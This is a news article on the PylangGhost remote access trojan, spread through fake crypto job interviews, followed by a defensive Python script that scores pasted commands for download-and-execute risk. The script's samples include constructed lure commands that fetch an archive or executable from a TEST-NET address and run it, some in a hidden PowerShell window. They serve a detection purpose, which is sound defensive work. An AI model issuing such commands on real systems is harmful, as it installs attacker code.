Cybersecurity experts have uncovered a disturbing campaign aimed at professionals in the blockchain sector, where fake job offers are being weaponized to deploy malicious software capable of stealing cryptocurrency wallet credentials and personal data.
According to a new report from Cisco Talos, a sophisticated remote access trojan (RAT) named PylangGhost has been observed targeting crypto enthusiasts and developers, particularly in regions like India. This malware, written in Python, is tied to a state-backed group often referred to as “Famous Chollima” (also known as “Wagemole”), believed to operate out of North Korea.
Deceptive Job Offers: The Perfect Bait
Victims are drawn in through fake job listings that imitate trusted companies in the crypto world—think names like Coinbase, Robinhood, and Uniswap. These fraudulent sites are meticulously designed to resemble real ones, tricking applicants into participating in staged recruitment processes.
Here's how the attack unfolds:
- Initial contact: Victims receive messages from fake recruiters.
- Skill assessment trap: They are directed to seemingly legitimate sites for coding tests.
- Video interviews: Targets are prompted to enable webcam and microphone access.
- Malicious payload: They are persuaded to run specific "video driver update" commands, which actually launch the malware.
Meet PylangGhost: A RAT with a Crypto Twist
PylangGhost, a Python-based evolution of the previously known GolangGhost malware, offers an expansive feature set. Once deployed, it grants remote control over the compromised machine and harvests credentials and session data stored by more than 80 browser extensions, among them:
- MetaMask
- 1Password
- NordPass
- Phantom
- TronLink
- Bitski
- Initia
- MultiverseX
More Than Just a Stealer
PylangGhost isn’t limited to snatching wallet data. It comes equipped with a wide toolkit:
- Captures screenshots
- Navigates and manipulates local files
- Extracts browser session data
- Scans system specifications
- Maintains persistent remote access
Same Tactics, Evolving Tools
These social engineering strategies aren't new. Similar lures were seen earlier this year when attackers linked to the $1.4 billion Bybit crypto heist baited developers with bogus recruitment coding tests whose code had been trojanized.
Was AI Involved in the Malware Code?
Interestingly, analysis of the source code found no sign that a large language model (such as ChatGPT) was used in its development: the comments and scripting style read as human-written, pointing to manual crafting.
How to Stay Safe
- Always verify job opportunities through official company channels, not through links or contact details supplied by the recruiter.
- Never paste commands a recruiter sends you into a terminal or PowerShell window, no matter how plausible the stated reason (a "camera fix" or "video driver update" is the lure used here).
- Use a sandbox or disposable virtual machine for any take-home test, unknown application or link.
- Keep browsers, browser extensions and password managers updated with security patches.
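As an added example (not code from Cisco Talos, and not based on any real PylangGhost indicator), the script below shows how a cautious candidate, or a help desk that gets asked "is this safe to run?", can triage a command before pasting it. It covers both the "video driver update" step described in the attack chain above and the trojanized coding-test repository mentioned in the Bybit paragraph. The rules are generic download-and-execute heuristics chosen for illustration, and every sample command is constructed, using TEST-NET addresses rather than real infrastructure; the rule names, weights and thresholds are assumptions, not published detection logic.

```python
"""Triage a command that a 'recruiter' asks a candidate to paste into a terminal.

Added example; not Cisco Talos code and not based on real PylangGhost indicators.
The rules are generic download-and-execute heuristics chosen for illustration
(an assumption), and the sample commands are constructed, using TEST-NET
addresses rather than any real infrastructure.
"""
import re

# (rule name, weight, pattern). Heuristics only; a miss is not a clean bill of health.
RULES = [
    ("remote_fetch", 2, r"\b(curl|wget|Invoke-WebRequest|iwr|certutil\s+-urlcache|bitsadmin)\b"),
    ("pipe_to_interpreter", 3, r"\|\s*(sh|bash|zsh|python3?|powershell|pwsh)\b"),
    ("encoded_powershell", 3, r"-(enc|encodedcommand|e)\b\s+[A-Za-z0-9+/=]{20,}"),
    # unpack an archive, then run something out of it: the shape of a "driver update" lure
    ("archive_then_run", 3,
     r"\b(unzip|tar\s+-?x\w*|Expand-Archive)\b.*?(&&|;|\|)\s*.*"
     r"\b(python3?|sh|bash|\.exe|\.vbs|\.bat|cscript|wscript)\b"),
    ("hidden_window", 2, r"-(w|WindowStyle)\s+hidden|-nop\b|-NonInteractive\b"),
    ("policy_bypass", 3, r"xattr\s+-d\s+com\.apple\.quarantine|-ExecutionPolicy\s+Bypass"),
    ("raw_ip_or_shortener", 1, r"https?://(\d{1,3}(\.\d{1,3}){3}|bit\.ly|tinyurl\.com)"),
    # "clone the coding test and install it": dependency install scripts run at install time
    ("clone_and_install", 2,
     r"\bgit\s+clone\b.*?(&&|;)\s*.*\b(npm|yarn|pnpm|pip3?)\s+(install|i|ci|add)\b"),
]
COMPILED = [(name, weight, re.compile(pat, re.IGNORECASE | re.DOTALL))
            for name, weight, pat in RULES]


def triage(command: str) -> dict:
    """Return the matched rule names, a weighted score and a verdict for one command."""
    hits = [name for name, _, rx in COMPILED if rx.search(command)]
    score = sum(weight for name, weight, _ in COMPILED if name in hits)
    if score >= 5:
        verdict = "block"    # fetch-and-execute chain: do not run it, report it
    elif score >= 2:
        verdict = "review"   # unusual for a hiring step; ask why before running
    else:
        verdict = "allow"    # nothing matched; still read it before pasting
    return {"hits": hits, "score": score, "verdict": verdict}


# Constructed samples (not real commands from the campaign; 203.0.113.0/24 is TEST-NET-3).
SAMPLES = {
    "lure_macos_linux": (
        "curl -sL http://203.0.113.10/drivers/camfix.zip -o /tmp/cam.zip && "
        "unzip /tmp/cam.zip -d /tmp/cam && python3 /tmp/cam/update.py"
    ),
    "lure_windows": (
        r'powershell -nop -w hidden -c "iwr http://203.0.113.10/d.zip -OutFile $env:TEMP\d.zip; '
        r'Expand-Archive $env:TEMP\d.zip $env:TEMP\d; & $env:TEMP\d\nvidia.exe"'
    ),
    "coding_test_repo": (
        "git clone https://github.com/example-org/take-home-test.git && "
        "cd take-home-test && npm install"
    ),
    "benign": "python3 -m pip install --upgrade pip",
}


def triage_all(samples: dict = SAMPLES) -> dict:
    """Triage every sample; returns {sample name: verdict}."""
    return {name: triage(cmd)["verdict"] for name, cmd in samples.items()}


if __name__ == "__main__":
    for name, cmd in SAMPLES.items():
        result = triage(cmd)
        print(f"{name:18} {result['verdict']:6} score={result['score']} hits={result['hits']}")
```

The two lure samples are flagged "block" because they chain a remote download to execution of whatever was downloaded, which is exactly what a recruiter-supplied "driver fix" does; the coding-test clone only reaches "review", since the risk there sits in the repository's install scripts and dependencies rather than in the command itself, so that repository still needs to be opened in a disposable VM, not on the workstation holding wallet extensions.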
